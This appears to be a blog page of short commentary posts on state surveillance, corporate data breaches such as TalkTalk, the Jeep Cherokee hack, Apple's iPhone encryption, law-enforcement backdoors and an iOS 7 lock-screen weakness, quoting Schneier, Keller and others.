Living with the surveillance state

Point made well by Bill Keller in a thoughtful column:

The danger, it seems to me, is not surveillance per se. We have already decided, most of us, that life on the grid entails a certain amount of intrusion. Nor is the danger secrecy, which, as Posner notes, “is ubiquitous in a range of uncontroversial settings,” a promise the government makes to protect “taxpayers, inventors, whistle-blowers, informers, hospital patients, foreign diplomats, entrepreneurs, contractors, data suppliers and many others.”

The danger is the absence of rigorous, independent regulation and vigilant oversight to keep potential abuses of power from becoming a real menace to our freedom. The founders created a system of checks and balances, but the safeguards have not kept up with technology. Instead, we have an executive branch in a leak-hunting frenzy, a Congress that treats oversight as a form of partisan combat, a political climate that has made “regulation” an expletive and a public that feels a generalized, impotent uneasiness. I don’t think we’re on a slippery slope to a police state, but I think if we are too complacent about our civil liberties we could wake up one day and find them gone — not in a flash of nuclear terror but in a gradual, incremental surrender.

Let’s turn the TalkTalk hacking scandal into a crisis

Yesterday’s Observer column:

The political theorist David Runciman draws a useful distinction between scandals and crises. Scandals happen all the time in society; they create a good deal of noise and heat, but in the end nothing much happens. Things go back to normal. Crises, on the other hand, do eventually lead to structural change, and in that sense play an important role in democracies.

So a good question to ask whenever something bad happens is whether it heralds a scandal or a crisis. When the phone-hacking story eventually broke, for example, many people (me included) thought that it represented a crisis. Now, several years – and a judicial enquiry – later, nothing much seems to have changed. Sure, there was a lot of sound and fury, but it signified little. The tabloids are still doing their disgraceful thing, and Rebekah Brooks is back in the saddle. So it was just a scandal, after all.

When the TalkTalk hacking story broke and I heard the company’s chief executive say in a live radio interview that she couldn’t say whether the customer data that had allegedly been stolen had been stored in encrypted form, the Runciman question sprang immediately to mind. That the boss of a communications firm should be so ignorant about something so central to her business certainly sounded like a scandal…

Read on

LATER Interesting blog post by Bruce Schneier. He opens with an account of how the CIA’s Director and the software developer Grant Blakeman had their email accounts hacked. Then,

Neither of them should have been put through this. None of us should have to worry about this.

The problem is a system that makes this possible, and companies that don’t care because they don’t suffer the losses. It’s a classic market failure, and government intervention is how we have to fix the problem.

It’s only when the costs of insecurity exceed the costs of doing it right that companies will invest properly in our security. Companies need to be responsible for the personal information they store about us. They need to secure it better, and they need to suffer penalties if they improperly release it. This means regulatory security standards.

The government should not mandate how a company secures our data; that will move the responsibility to the government and stifle innovation. Instead, government should establish minimum standards for results, and let the market figure out how to do it most effectively. It should allow individuals whose information has been exposed sue for damages. This is a model that has worked in all other aspects of public safety, and it needs to be applied here as well.

He’s right. Only when the costs of insecurity exceed the costs of doing it right will companies invest properly in it. And governments can fix that, quickly, by changing the law. For once, this is something that’s not difficult to do, even in a democracy.

So even Apple can’t break into my iPhone?

Hmmm… I wonder. This from SiliconBeat:

Apple says it would be burdensome — and mostly impossible — for it to unlock people’s iPhones upon the request of law enforcement.

In a legal filing this week, the iPhone maker answered a question posed by U.S. Magistrate Judge James Orenstein, who had been urged by federal prosecutors to force Apple to unlock an iPhone. Orenstein said last week that he would defer ruling until Apple let him know whether it’s feasible to bypass an iPhone’s passcode.

Here’s the meat of Apple’s response, which comes amid law enforcement officials’ growing frustration over tech companies’ increased privacy and security efforts:

“In most cases now and in the future, the government’s requested order would be substantially burdensome, as it would be impossible to perform. For devices running iOS 8 or higher, Apple would not have the technical ability to do what the government requests—take possession of a password protected device from the government and extract unencrypted user data from that device for the government. Among the security features in iOS 8 is a feature that prevents anyone without the device’s passcode from accessing the device’s encrypted data. This includes Apple.”

Want to network your Jeep Cherokee? Try smoke signals: they’re safer

This morning’s Observer column:

‘‘Jeep Cherokee hacked in demo; Chrysler owners urged to download patch”, was the heading on an interesting story last week. “Just imagine,” burbled the report, “one moment you’re listening to some pleasant pop hits on the radio, and the next moment the hip-hop station is blasting at full volume – and you can’t change it back! This is just one of the exploits of Charlie Miller and Chris Valasek … when they hacked into a Jeep Cherokee. They were able to change the temperature of the air conditioning, turn on the windshield wipers and blast the wiper fluid to blur the glass, and even disable the brakes, turn off the transmission, take control of the steering, and display their faces onto the dashboard’s screen.”

In some ways, this was an old story: cars have been largely governed by electronics since the 1980s, and anyone who controls the electronics controls the car. But up to now, the electronics have not been connected to the internet. What makes the Jeep Cherokee story interesting is that its electronics were hacked via the internet. And that was possible because internet connectivity now comes as a consumer option – Uconnect – from Chrysler.

If at this point you experience a sinking feeling, then join the club. So let us return to first principles for a moment…

Read on

LATER: Chrysler has issued a recall for 1.4 million vehicles as a result of the hacking revelations.

Common sense about hacking

From the Economist blog:

FOR companies, there are two strategies for dealing with people who uncover flaws in their IT security: a right way and a wrong way. Our leader on hacking this week tells of the approach that Volkswagen took when a group of academics informed it that they had uncovered a vulnerability in a remote-car-key system: the firm slapped a court injunction on them. It is difficult to conceive of an approach more likely to be counter-productive.

United Airlines, it seems, has a far more enlightened attitude. It has just awarded two hackers 1m air miles each after they managed to spot security weak spots in its website. The move is part of a scheme called “bug bounty”, in which hackers are incentivised to contact the company with security flaws, rather than post them online. This approach is common at Silicon Valley firms, and makes just as much sense for old-fashioned industries too. Pound to a penny, there are nefarious types out there trying to break into most big companies’ IT systems. Encouraging “white-hat” hackers to uncover flaws, and then rewarding them for not revealing them to the wider world, may sit uncomfortably with people’s sense of fairness. However, if it gives firms time to fix the problem, in pragmatic terms the benefit is obvious.

Yep.

Old cryptopanic in new iBottles

Repeat after me:

A ‘backdoor’ for law enforcement is a deliberately introduced security vulnerability, a form of architected breach.

Or, if you’d like the more sophisticated version

It requires a system to be designed to permit access to a user’s data against the user’s wishes, and such a system is necessarily less secure than one designed without such a feature. As computer scientist Matthew Green explains in a recent Slate column (and, with several eminent colleagues, in a longer 2013 paper) it is damn near impossible to create a security vulnerability that can only be exploited by “the good guys.” Activist Eva Galperin puts the point pithily: “Once you build a back door, you rarely get to decide who walks through it.” Even if your noble intention is only to make criminals more vulnerable to police, the unavoidable cost of doing so in practice is making the overwhelming majority of law-abiding users more vulnerable to criminals.

Bruce Schneier’s next book

Title: Data and Goliath: The Hidden Battles to Collect Your Data and Control Your World

Publisher: WW Norton

Publication date: March 9, 2015

Table of Contents

Part 1: The World We’re Creating
Chapter 1: Data as a By-Product of Computing
Chapter 2: Data as Surveillance
Chapter 3: Analyzing our Data
Chapter 4: The Business of Surveillance
Chapter 5: Government Surveillance and Control
Chapter 6: Consolidation of Institutional Surveillance

Part 2: What’s at Stake
Chapter 7: Political Liberty and Justice
Chapter 8: Commercial Fairness and Equality
Chapter 9: Business Competitiveness
Chapter 10: Privacy
Chapter 11: Security

Part 3: What to Do About It
Chapter 12: Principles
Chapter 13: Solutions for Government
Chapter 14: Solutions for Corporations
Chapter 15: Solutions for the Rest of Us
Chapter 16: Social Norms and the Big Data Trade-Off

Something to be pre-ordered, methinks.

Neoliberalism’s revolving door

Well, guess what? The former Head of the NSA has found a lucrative retirement deal.

As the four-star general in charge of U.S. digital defenses, Keith Alexander warned repeatedly that the financial industry was among the likely targets of a major attack. Now he’s selling the message directly to the banks.

Joining a crowded field of cyber-consultants, the former National Security Agency chief is pitching his services for as much as $1 million a month. The audience is receptive: Under pressure from regulators, lawmakers and their customers, financial firms are pouring hundreds of millions of dollars into barriers against digital assaults.

Alexander, who retired in March from his dual role as head of the NSA and the U.S. Cyber Command, has since met with the largest banking trade groups, stressing the threat from state-sponsored attacks bent on data destruction as well as hackers interested in stealing information or money.

“It would be devastating if one of our major banks was hit, because they’re so interconnected,” Alexander said in an interview.

Nice work if you can get it. First of all you use your position in the state bureaucracy to scare the shit out of banks. Then you pitch your services as the guy who can help them escape Nemesis.

The US fears back-door routes into the net because it’s building them too

This morning’s Observer column.

At a remarkable conference held at the Aspen Institute in 2011, General Michael Hayden, a former head of both the NSA and the CIA, said something very interesting. In a discussion of how to secure the “critical infrastructure” of the United States he described the phenomenon of compromised computer hardware – namely, chips that have hidden “back doors” inserted into them at the design or manufacturing stage – as “the problem from hell”. And, he went on, “frankly, it’s not a problem that can be solved”.

Now General Hayden is an engaging, voluble, likable fellow. He’s popular with the hacking crowd because he doesn’t talk like a government suit. But sometimes one wonders if his agreeable persona is actually a front for something a bit more disingenuous. Earlier in the Aspen discussion, for example, he talked about the Stuxnet worm – which was used to destroy centrifuges in the Iranian nuclear programme – as something that was obviously created by a nation-state, but affected not to know that the US was one of the nation-states involved.

Given Hayden’s background and level of security clearance, it seems inconceivable that he didn’t know who built Stuxnet. So already one had begun to take his contributions with a modicum of salt. Nevertheless, his observation about the intractability of the problem of compromised hardware seemed incontrovertible…

Read on.

LATER: I come on this amazing piece of detective work which uncovers a backdoor installed in some D-Link routers.

Why having a passcode might not protect your iPhone 5s from unauthorised use

Well, well. Alongside the discovery that the iPhone 5s fingerprint system isn’t quite as secure as advertised comes this.

If you have an iPhone 5 or older and have updated your operating system to Apple’s new iOS 7 version, you should be aware that the password (or “passcode”) required on your phone’s lock screen no longer prevents strangers from accessing your phone.

They can use Siri, the voice-command software, to bypass the password screen and access your phone, instead.

The good news is that distressed iPhone 5S owners can apparently foil this workaround by controlling access to Siri in the phone’s settings menu. The trail is: Settings –> General –> Passcode Lock [enter passcode] –> Allow access when locked > Siri > switch from green to white.